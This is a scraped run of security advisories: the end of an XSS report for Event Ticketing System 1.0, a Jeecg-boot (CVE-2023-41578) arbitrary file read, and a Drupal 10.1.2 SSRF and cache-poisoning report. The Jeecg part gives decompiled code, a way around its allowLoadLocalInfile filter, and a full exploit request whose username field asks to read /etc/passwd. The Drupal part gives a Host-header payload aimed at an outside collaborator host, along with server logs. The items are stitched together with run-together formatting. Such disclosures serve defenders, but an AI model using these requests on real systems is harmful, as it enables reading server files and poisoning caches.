Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Event-Ticketing-System-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/event-ticketing-system-10-xss-reflected.html)## Time spent:01:25:00

Event Ticketing System 1.0 Cross Site Scripting

Jeecg boot up to v3.5.3 was discovered to contain an arbitrary file read vulnerability via the interface /testConnection.

In the /testConnection route, a MySQL connection can be constructed to cause arbitrary file reading.

@PostMapping({"/testConnection"})
    public Result a(@RequestBody JmreportDynamicDataSourceVo var1) {
        Connection var2 = null;
        String var3 = var1.toString();
        a.info(" local cache key: " + var3);
        Object var4 = this.localCache.a(var3);
        if (g.d(var4)) {
            int var5 = g.e(var4);
            a.info(" local cache value: " + var5);
            if (var5 >= 3) {
                return Result.error("数据源已连接错误3次以上,请检查配置信息！");
            }

            if (var5 == 0) {
                return Result.OK("数据库连接成功", true);
            }
        } else {
            this.localCache.a(var3, 0, 3600000L);
        }

        try {
            Result var6;
            try {
                String var37 = var1.getDbType();
                Result var40;
                if (this.jmReportDbSourceService.isHave(d.cI, var37)) {
                    boolean var39 = this.jmreportNoSqlService.testConnection(var1);
                    if (var39) {
                        var40 = Result.OK("数据库连接成功", true);
                        return var40;
                    } else {
                        this.localCache.a(var3, 1);
                        var40 = Result.error("数据库连接失败：错误未知");
                        return var40;
                    }
                } else {
                    Class.forName(var1.getDbDriver());
                    DriverManager.setLoginTimeout(60);
                    String var38 = org.jeecg.modules.jmreport.dyndb.util.b.g(var1.getDbUrl());
                    var2 = DriverManager.getConnection(var38, var1.getDbUsername(), var1.getDbPassword());
                    if (var2 == null) {
                        this.localCache.a(var3, 1);
                        var40 = Result.OK("数据库连接失败：错误未知", true);
                        return var40;

There is protection during the parsing process.

    public static String g(String var0) {
        if (a(var0, "mysql")) {
            if (var0.indexOf("allowLoadLocalInfile") > 0) {
                var0 = var0.replaceAll("(?i)allowLoadLocalInfile=true", "allowLoadLocalInfile=false");
            } else {
                var0 = var0 + "&allowLoadLocalInfile=false";
            }
        }

we can bypass it

POST /jeecg-boot/jmreport/testConnection HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 0
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

{
    "id":"1",
    "code":"select \* from information\_schema.tables",
    "dbType":"jndi",
    "dbDriver":"com.mysql.cj.jdbc.Driver",
    "dbUrl":"jdbc:mysql://localhost:3307/test?allowLoadLocalInfile=yes",
    "dbName":"information\_schema",
    "dbUsername":"fileread\_/etc/passwd",
    "dbPassword":"password",
    "connectionTimaes":"5"
}

CVE-2023-41578: Jeecg-boot <=3.5.3 Arbitrary File Read · Issue #1 · Snakinya/Bugs

Drupal version 10.1.2 appears to suffer from web cache poisoning due to a server-side request forgery vulnerability.

    ## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction## Author: nu11secur1ty## Date: 08/30/2023## Vendor: https://www.drupal.org/## Software: https://www.drupal.org/download## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http## Description:It is possible to induce the application to perform server-side HTTPrequests to arbitrary domains.The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com wassubmitted in the HTTP Host header.The application performed an HTTP request to the specified domain. Forthe second test, the attacker stored a responseon the server with malicious content. This can be bad for a lot ofusers of this system if the attacker spreads a malicious URLand sends it by email etc. By using a redirect exploit.STATUS: HIGH-Vulnerability[+]Exploit:```GETGET /drupal/web/?psp4hw87ev=1 HTTP/1.1Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.comAccept-Encoding: gzip, deflate, psp4hw87evAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7,text/psp4hw87evAccept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36 psp4hw87evConnection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Origin: https://psp4hw87ev.pwnedhost.com```[+]Response from Burpcollaborator server:```HTTPHTTP/1.1 200 OKServer: Burp Collaborator https://burpcollaborator.net/X-Collaborator-Version: 4Content-Type: text/htmlContent-Length: 62<html><body>zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz</body></html>```[+]Response from Attacker server```HTTP192.168.100.45 - - [30/Aug/2023 05:52:56] "GET/drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1"```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html)## Time spend:03:35:00

Tag

#apple